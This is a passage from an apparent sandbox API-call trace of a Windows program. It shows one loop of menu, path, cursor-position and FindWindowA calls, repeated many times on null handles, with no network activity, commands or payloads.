GetMenu (hWnd=0x0) returned 0x0 [0027.400] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3c3) returned -1 [0027.400] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.401] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.401] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.401] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.401] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.401] GetStockObject (i=6) returned 0x1b00018 [0027.401] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.401] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.401] PathFileExistsW (pszPath=0x0) returned 0 [0027.401] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.401] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.401] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.401] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.401] GetMenu (hWnd=0x0) returned 0x0 [0027.401] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.401] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.401] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.401] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.401] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.401] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.401] GetStockObject (i=6) returned 0x1b00018 [0027.401] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.401] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.401] PathFileExistsW (pszPath=0x0) returned 0 [0027.401] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.401] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.401] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.402] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.402] GetMenu (hWnd=0x0) returned 0x0 [0027.402] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.402] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.402] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.402] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.402] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.402] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.402] GetStockObject (i=6) returned 0x1b00018 [0027.402] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.402] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.402] PathFileExistsW (pszPath=0x0) returned 0 [0027.402] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.402] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.402] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.402] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.402] GetMenu (hWnd=0x0) returned 0x0 [0027.403] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.403] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.403] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.403] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.403] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.403] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.403] GetStockObject (i=6) returned 0x1b00018 [0027.403] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.403] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.403] PathFileExistsW (pszPath=0x0) returned 0 [0027.403] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.403] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.403] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.403] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.403] GetMenu (hWnd=0x0) returned 0x0 [0027.403] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.403] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.403] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.403] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.403] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.403] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.403] GetStockObject (i=6) returned 0x1b00018 [0027.403] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.403] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.403] PathFileExistsW (pszPath=0x0) returned 0 [0027.403] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.404] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.404] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.404] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.404] GetMenu (hWnd=0x0) returned 0x0 [0027.404] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3c3) returned -1 [0027.404] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.404] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.404] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.404] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.404] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.404] GetStockObject (i=6) returned 0x1b00018 [0027.404] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.404] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.404] PathFileExistsW (pszPath=0x0) returned 0 [0027.404] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.404] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.404] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.404] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.404] GetMenu (hWnd=0x0) returned 0x0 [0027.404] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.404] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.404] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.404] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.404] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.404] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.404] GetStockObject (i=6) returned 0x1b00018 [0027.404] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.405] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.405] PathFileExistsW (pszPath=0x0) returned 0 [0027.405] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.405] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.405] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.405] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.405] GetMenu (hWnd=0x0) returned 0x0 [0027.405] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.405] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.405] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.405] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.405] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.405] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.405] GetStockObject (i=6) returned 0x1b00018 [0027.405] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.405] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.405] PathFileExistsW (pszPath=0x0) returned 0 [0027.405] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.405] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.405] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.405] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.405] GetMenu (hWnd=0x0) returned 0x0 [0027.405] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.405] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.405] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.405] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.406] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.406] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.406] GetStockObject (i=6) returned 0x1b00018 [0027.406] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.406] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.406] PathFileExistsW (pszPath=0x0) returned 0 [0027.406] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.406] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.406] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.406] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.406] GetMenu (hWnd=0x0) returned 0x0 [0027.406] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.406] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.406] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.406] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.406] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.406] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.406] GetStockObject (i=6) returned 0x1b00018 [0027.406] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.406] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.406] PathFileExistsW (pszPath=0x0) returned 0 [0027.406] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.406] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.406] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.406] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.406] GetMenu (hWnd=0x0) returned 0x0 [0027.406] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x278) returned -1 [0027.407] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.407] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.407] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.407] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.407] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.407] GetStockObject (i=6) returned 0x1b00018 [0027.407] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.407] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.407] PathFileExistsW (pszPath=0x0) returned 0 [0027.407] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.407] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.407] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.407] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.407] GetMenu (hWnd=0x0) returned 0x0 [0027.407] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.407] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.407] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.407] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.407] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.407] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.407] GetStockObject (i=6) returned 0x1b00018 [0027.407] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.407] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.407] PathFileExistsW (pszPath=0x0) returned 0 [0027.407] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.407] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.407] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.407] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.408] GetMenu (hWnd=0x0) returned 0x0 [0027.408] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.408] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.408] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.408] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.408] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.408] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.408] GetStockObject (i=6) returned 0x1b00018 [0027.408] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.408] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.408] PathFileExistsW (pszPath=0x0) returned 0 [0027.408] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.408] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.408] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.408] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.408] GetMenu (hWnd=0x0) returned 0x0 [0027.408] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.408] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.408] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.408] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.408] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.408] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.408] GetStockObject (i=6) returned 0x1b00018 [0027.408] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.408] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.408] PathFileExistsW (pszPath=0x0) returned 0 [0027.408] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.409] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.409] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.409] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.409] GetMenu (hWnd=0x0) returned 0x0 [0027.409] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.409] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.409] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.409] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.409] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.409] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.409] GetStockObject (i=6) returned 0x1b00018 [0027.409] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.409] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.409] PathFileExistsW (pszPath=0x0) returned 0 [0027.409] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.409] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.409] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.409] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.409] GetMenu (hWnd=0x0) returned 0x0 [0027.409] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2dd) returned -1 [0027.409] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.409] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.409] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.409] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.409] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.409] GetStockObject (i=6) returned 0x1b00018 [0027.410] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.410] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.410] PathFileExistsW (pszPath=0x0) returned 0 [0027.410] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.410] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.410] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.410] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.410] GetMenu (hWnd=0x0) returned 0x0 [0027.410] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.410] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.410] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.410] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.410] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.410] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.410] GetStockObject (i=6) returned 0x1b00018 [0027.410] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.410] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.410] PathFileExistsW (pszPath=0x0) returned 0 [0027.410] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.410] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.410] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.410] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.410] GetMenu (hWnd=0x0) returned 0x0 [0027.410] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.410] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.410] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.410] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.410] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.411] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.411] GetStockObject (i=6) returned 0x1b00018 [0027.411] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.411] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.411] PathFileExistsW (pszPath=0x0) returned 0 [0027.411] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.411] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.411] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.411] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.411] GetMenu (hWnd=0x0) returned 0x0 [0027.411] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.411] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.411] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.411] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.411] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.411] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.411] GetStockObject (i=6) returned 0x1b00018 [0027.411] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.411] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.411] PathFileExistsW (pszPath=0x0) returned 0 [0027.411] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.411] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.411] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.411] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.411] GetMenu (hWnd=0x0) returned 0x0 [0027.411] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.411] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.412] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.412] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.412] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.412] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.412] GetStockObject (i=6) returned 0x1b00018 [0027.412] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.412] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.412] PathFileExistsW (pszPath=0x0) returned 0 [0027.412] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.412] GetCursorPos (in: 